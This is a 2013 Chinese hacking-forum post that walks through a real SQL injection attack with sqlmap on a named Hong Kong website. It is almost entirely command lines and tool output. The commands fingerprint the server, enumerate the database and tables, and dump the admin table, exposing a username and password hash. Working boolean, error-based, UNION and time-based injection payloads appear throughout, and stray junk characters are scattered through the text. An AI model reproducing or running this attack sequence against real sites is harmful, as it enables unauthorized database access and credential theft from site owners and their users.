找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2359|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
3 [4 ^8 C; M( Y" Zms "Mysql" --current-user       /*  注解:获取当前用户名称( o. o" E0 r1 C+ A
    sqlmap/0.9 - automatic SQL injection and database takeover tool  R5 B/ y9 F; S5 z/ n! v' l6 h* [
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    2 \$ w# O9 o7 Q( f5 w7 O[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    " }! o5 h, Z; j* V# W7 ^( h session file0 f/ G; |" n5 u
    [16:53:54] [INFO] resuming injection data from session file& z' C$ a; q* ~5 w
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    1 b, a  E( Y* {+ }[16:53:54] [INFO] testing connection to the target url
    # T# C  g/ D% W" p% ^4 p& \) Vsqlmap identified the following injection points with a total of 0 HTTP(s) reque1 a" v, e' l, N7 ~( q# v9 ]
    sts:5 p# s: q/ D/ T& q, V! A" j
    ---
    & e) t  e/ ~' a- pPlace: GET" U0 l: Z' w( m
    Parameter: id
    5 c+ e! J" z8 i( A0 d# Z$ n& a    Type: boolean-based blind8 C% v3 {+ j+ }
        Title: AND boolean-based blind - WHERE or HAVING clause4 N/ K  F, l( J  V  g( q. O! i' i
        Payload: id=276 AND 799=799
    $ F$ {7 ^! v8 o+ N/ V% B* C) k6 }    Type: error-based) c' h7 [* Z$ I2 B6 a
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause# x) i2 Q3 X' l" }" p
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; T& F6 D9 U& M
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ( z; {; {& w0 D4 T/ D: W. D0 h# |- c),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    , K! j; L" k9 G. {  k    Type: UNION query
    . v- @; A, t+ F% x    Title: MySQL UNION query (NULL) - 1 to 10 columns
    & K4 d& n$ B) S" \% m: e    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 Z0 {! z* b  _
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),% p: m2 s" L% W' v# U$ O
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    % c/ d0 ?1 ~6 R4 Q, E, W2 G    Type: AND/OR time-based blind
    $ ?% b7 \; F' E# c# D) b9 P    Title: MySQL > 5.0.11 AND time-based blind8 c8 G4 {9 q  H0 ~* E" @
        Payload: id=276 AND SLEEP(5)' M8 u" s& b" q5 O
    ---
    : R% r% \3 w5 c4 ^% W. M[16:53:55] [INFO] the back-end DBMS is MySQL5 H& r/ Y+ j& ]  h  _
    web server operating system: Windows
    * w/ f' V7 g, Q+ z; ^" A1 Z" T3 Dweb application technology: Apache 2.2.11, PHP 5.3.04 G0 x* S' v! N
    back-end DBMS: MySQL 5.0
    $ O8 O$ ]1 ?7 `[16:53:55] [INFO] fetching current user
    . |7 l. f& J( ^2 P! ocurrent user:    'root@localhost'   
    9 A: `6 t7 a, v$ W: t[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    ' Y7 z6 X. _7 _' N4 ~tput\www.wepost.com.hk'
  • shutting down at: 16:53:582 g% k# Z5 E( C2 X8 R/ o0 V

    ( Z3 |" _% _" N* J/ X: Y" |, B8 oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    # M7 G# {1 ^5 y( {6 wms "Mysql" --current-db                  /*当前数据库
      o1 y- Q- T3 u, p0 ~    sqlmap/0.9 - automatic SQL injection and database takeover tool
    1 M* k; r+ L1 ~+ }0 _8 s    http://sqlmap.sourceforge.net
  • starting at: 16:54:160 A& z( d2 S; k# e3 y1 J
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    4 V( |9 ~# [5 q( ~ session file3 Z( i" R0 p; E% n: O: @- y
    [16:54:16] [INFO] resuming injection data from session file$ z: g. ?4 o0 p0 M
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ' u, ^2 D) S9 l6 w[16:54:16] [INFO] testing connection to the target url5 I$ c  Z9 ?" s3 _% \! x
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque5 y4 T+ z9 w7 Z/ e9 @* J
    sts:
    1 D' z( F1 f+ S---/ e0 P" b8 |$ b# J, \; Q) n
    Place: GET
    $ ?( [9 o4 ^6 L% |1 H6 `Parameter: id
    5 r9 J6 @7 Z+ q; F' w; k* {    Type: boolean-based blind
    ! K; {/ ?: g" k0 ~1 g3 P2 [    Title: AND boolean-based blind - WHERE or HAVING clause
    # B. ^" W, y, C+ n* K7 o  h    Payload: id=276 AND 799=799
    9 ]. q. Z) B4 k) w- \' k    Type: error-based
    ) o& @8 k$ X! t" s9 s7 T5 q* ]7 C    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ! r- Q; D5 f9 n3 n0 ?5 r# F$ b    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    6 x& j$ J' P6 W" ^1 L7 I* {120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,583 z! @2 y5 p0 _% I9 n
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 ^0 \" v" f3 q! p5 w/ N$ j
        Type: UNION query' ~) P: S! ]/ B- D
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    : R8 `' w* _& Q) U$ [" a2 M/ y. d    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR; d! H$ h: z2 v6 d5 c% d* z
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    : ?) d1 D0 a% X" b  hCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    3 n- j' g7 c5 l& t    Type: AND/OR time-based blind% p, P# m8 n0 c/ ?
        Title: MySQL > 5.0.11 AND time-based blind! m* a; C  f7 b9 y* }# Z% p. `5 G
        Payload: id=276 AND SLEEP(5)/ X6 U  R7 T6 T0 {: O' n. h
    ---, H9 G3 R, r, h
    [16:54:17] [INFO] the back-end DBMS is MySQL5 Q. Y: y/ V; n6 C
    web server operating system: Windows3 n7 K+ ]. _9 R2 R
    web application technology: Apache 2.2.11, PHP 5.3.0
    & M4 H. P  d$ E8 @( N) j, ~  D3 r7 Fback-end DBMS: MySQL 5.04 ~: @0 d  [! O; z* S% z
    [16:54:17] [INFO] fetching current database
    2 N: @  E3 B9 m; z! d2 pcurrent database:    'wepost'
    3 J& Q# o) H( C- f9 l[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou" G  P4 `" W2 L# j. R; d: v1 L
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:187 f  j, K5 T" w* D! X- y; n
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    % r. `0 Q) O2 ^( z( Y. ~- R# Zms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    1 a( h6 @3 s+ c' @' A, p" w    sqlmap/0.9 - automatic SQL injection and database takeover tool. W( T9 _+ v$ X
        http://sqlmap.sourceforge.net
  • starting at: 16:55:258 x* y5 n% x& s" V- M# Q1 N
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as1 R" O' ?$ r$ z
    session file& C) A. h9 |6 O  }
    [16:55:25] [INFO] resuming injection data from session file$ D# S7 m) @; S* t( ?
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    9 H- @# B- E) \  Q7 n[16:55:25] [INFO] testing connection to the target url; l9 s( c2 {5 M$ J* P8 O
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque- Y: s% a! S* r+ e2 w8 K7 s+ s
    sts:
    $ C0 @& X% A1 G# y4 l! p" S---6 P0 r3 X/ f! Y7 }
    Place: GET) ?5 v0 f1 G, L, p9 l8 _
    Parameter: id
    + l- u" O$ l; q) T  a/ _. h    Type: boolean-based blind
    3 T* w; v$ ^- Z; C8 S1 T- |    Title: AND boolean-based blind - WHERE or HAVING clause6 U- ?. M5 [+ y3 w6 y3 r
        Payload: id=276 AND 799=799
      E  K1 q; V, {0 h% k" M    Type: error-based
    . ^# V* X0 f0 ~' C1 z    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
      y9 w6 i' d' O, E) H* @    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    ' {( Z- V2 z- ^" m% P6 \2 }$ `120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    , D- `. X+ t1 R1 r: A),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
      z, ?' ~( ~+ T1 d  C' p7 j    Type: UNION query
    $ o6 z, \8 }: ~3 _0 P- b! o    Title: MySQL UNION query (NULL) - 1 to 10 columns
    / g$ \, @( Y0 G8 G4 `    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR( k5 }: z7 m" R+ p" b. ?* n8 U
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),* y* p- T: c; o# k; A. k: Z
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#6 M  r5 L3 |6 @" U# ]1 _4 G, d
        Type: AND/OR time-based blind" A8 c4 P) S4 h/ O. Q9 H, H' G
        Title: MySQL > 5.0.11 AND time-based blind) L! t8 N1 z" t4 e& {& s
        Payload: id=276 AND SLEEP(5)7 P* g' U* M2 C9 t3 b1 S4 s
    ---% h" v7 q& B6 C  ]( K8 p
    [16:55:26] [INFO] the back-end DBMS is MySQL
    ( m$ I' H* S$ f8 S6 m! l9 I* B2 I5 qweb server operating system: Windows$ r; e) n. p! |6 {/ b% L* F
    web application technology: Apache 2.2.11, PHP 5.3.0
    6 ~# O0 @) ^3 V7 o5 o$ Uback-end DBMS: MySQL 5.0% L8 z; I; H! h: \0 Z
    [16:55:26] [INFO] fetching tables for database 'wepost'
    5 j: w; k% s7 J6 O" K[16:55:27] [INFO] the SQL query used returns 6 entries
    ; k1 j9 Z/ ^% z" s& qDatabase: wepost
    : z5 e  W3 k' T) G. I[6 tables]
    , @% {; v$ x6 c5 y: J' W* D+-------------+9 E& w3 G. `, u2 p: _
    | admin       |
    : r3 Z9 |6 d1 f, F6 C| article     |: p7 I/ e7 H$ P$ F/ l2 \1 f
    | contributor |
    % [) S9 E0 G, W( j- ]( e# m| idea        |5 e7 y2 H- h( d$ q2 I4 a
    | image       |. {! _: Z3 f7 `8 @& A/ y7 @4 r
    | issue       |' @6 t  i! j: b: M8 K6 Y7 `
    +-------------+
    3 I" e! z* F+ I! i1 v* b+ L; s/ x[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    , L: |# _8 D" ^/ qtput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    4 T. S& z( i' n* a; h  }, Z
    , F$ \) ~5 k0 c* V. A% ZD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db( ?" n9 q2 t; K( j" e
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名; U6 \. q. D  A
        sqlmap/0.9 - automatic SQL injection and database takeover tool; a  E9 \7 b  k* R9 t8 ?
        http://sqlmap.sourceforge.net
  • starting at: 16:56:067 A7 s, M$ k1 ?" D& d
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque! K  w) Z) D  n4 [' L8 @1 R
    sts:/ n2 ?9 h% u" v' q) a# J, @0 b$ w
    ---
    9 \: c# j  T: _: i' e# YPlace: GET8 W" ~4 x% h9 g$ c2 T$ [
    Parameter: id1 W& D& x; }( `
        Type: boolean-based blind
    $ z% J1 X1 i" E; F; n, N    Title: AND boolean-based blind - WHERE or HAVING clause
      R1 C4 }8 A# a: S" o    Payload: id=276 AND 799=799
    1 ^6 ~4 P- ]' N    Type: error-based
    % |2 v7 V! d, w$ N6 [    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- I  q$ q. [; Y; F
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    . N, h, t% v( p2 ^* Z120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58" M6 K3 S1 C: p! e9 o
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    2 D$ |. m* k4 u- K5 e    Type: UNION query# e( v3 F& q( k- {1 n# i% s
        Title: MySQL UNION query (NULL) - 1 to 10 columns" M# c2 \9 [1 Y, L8 J  `
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    9 X- ^2 }0 N! [/ e(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! F4 w. c  x' K; V' t
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#3 M4 |9 F! I8 C* t
        Type: AND/OR time-based blind7 v4 x3 N8 P( ~, M: r8 w
        Title: MySQL > 5.0.11 AND time-based blind
    * s9 B/ x0 t! F3 ]8 Q$ @5 ]    Payload: id=276 AND SLEEP(5)* {0 v* n2 h7 ~. K7 T
    ---9 L6 J5 B+ T, _) U* `: E# d
    web server operating system: Windows4 ], V+ Y# S, G- i' w$ s
    web application technology: Apache 2.2.11, PHP 5.3.0( f# B; x" p0 `9 ^: H6 P" ?
    back-end DBMS: MySQL 5.07 E# V, q3 N9 [
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    ) I  d. ?" l: i8 c/ g6 @ssion': wepost, wepost
    * S( Z6 S) E/ c5 ~* E/ lDatabase: wepost
    0 P+ w+ B# E$ k1 H; jTable: admin
    : p7 Z) W2 G, s% `" ?5 \( K& y[4 columns]3 N2 K' @2 M) ]1 X7 O2 Z: W7 a" ~
    +----------+-------------+
    $ Y1 d2 r7 N& Z8 U  Z, E| Column   | Type        |
      i2 F8 f# h8 F5 |$ R/ U+----------+-------------+7 k, i, D8 n' `8 |3 g% x
    | id       | int(11)     |
    $ [! [1 H% x& a| password | varchar(32) |- f$ [) s$ p  g) O- c% B
    | type     | varchar(10) |2 C6 _, L0 m; l" Y2 B
    | userid   | varchar(20) |; ?! V3 x0 R$ |% V8 M* o: U
    +----------+-------------+* f+ [6 a) o. a4 _
  • shutting down at: 16:56:19' d( W7 Y: {1 C# R6 E4 [0 I- `% b
    - u# c1 v  i* W  j; a, u0 o3 d
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    9 [4 }2 d# ^4 C& R1 b. ems "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    / v$ [) m) a- l9 U9 h# Y    sqlmap/0.9 - automatic SQL injection and database takeover tool
    6 f8 J5 a- g: T5 |  l# e* Y    http://sqlmap.sourceforge.net
  • starting at: 16:57:142 Y* D' R0 m# L3 _
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    0 O( p7 j1 V9 R3 k$ [5 ]+ ysts:3 {! \% F/ U* G2 ]0 l+ n$ l! D
    ---
    : i/ |, l, {( v: n0 {3 MPlace: GET
    * a: R# H- d; l" n1 eParameter: id8 |+ s! u9 x; |% |$ a. s! Q, T
        Type: boolean-based blind
    2 u, L+ s3 @; L4 J    Title: AND boolean-based blind - WHERE or HAVING clause$ G) y+ [- H5 g  {
        Payload: id=276 AND 799=799
    - z1 X7 O! m/ B/ D" [& Z    Type: error-based0 S  s5 T0 C+ s$ n
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause, l+ M% T' h* e/ m/ X6 N
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 W& M5 S4 R0 Q) D
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ( K4 H( k2 p: f, e, w),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 D6 L- y9 a+ u2 x7 x+ t
        Type: UNION query
    % h. D7 l& R# k1 q% Z) {% u9 T    Title: MySQL UNION query (NULL) - 1 to 10 columns
    9 N4 ~- L" \. T: d1 t    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% x; S5 {9 ~+ v7 I
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    . P) P" X, m+ @/ Q8 r' q% }* fCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#5 C, r0 Q( E3 a7 y9 Z# D
        Type: AND/OR time-based blind
    ! J+ _- |. D. d% {# K    Title: MySQL > 5.0.11 AND time-based blind
    ! M- `" F3 P3 R) a/ E3 F    Payload: id=276 AND SLEEP(5)# [3 c1 P8 b8 z: P* W* I
    ---
    " ?& s% M8 c  g. @; @+ Uweb server operating system: Windows
    7 K/ {+ ?) P$ \web application technology: Apache 2.2.11, PHP 5.3.0, U& x) [/ t" H  \8 M( a* ?
    back-end DBMS: MySQL 5.0
    2 p1 q+ x6 D1 ]7 m! O9 r0 l0 vrecognized possible password hash values. do you want to use dictionary attack o
      n3 z" _* W# n: Pn retrieved table items? [Y/n/q] y
      H5 y, a5 ?: \4 F/ V  F1 Dwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]0 W/ s9 p# \2 D4 y( ?# U# l
    do you want to use common password suffixes? (slow!) [y/N] y
    8 {4 n/ L$ s! @# xDatabase: wepost  p  B4 y9 V5 k4 N
    Table: admin
    1 l1 J4 `1 c7 k/ k[1 entry]
    2 ~6 t2 a; a+ w1 b+ O- K# S+----------------------------------+------------+" o% f* o" L4 j$ q/ _
    | password                         | userid     |
    $ |' c9 C% T8 M* D) j4 o+----------------------------------+------------+$ z' d- n8 M- l! Q+ Z+ _  j
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    2 L9 ]. }. @. w8 @+ L' G6 n+----------------------------------+------------+
    2 g" Z1 i# y2 `+ i( |
  • shutting down at: 16:58:14' N( v& `! t- }7 l- X: u

    2 z, B$ u( Q& F+ F7 {: aD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表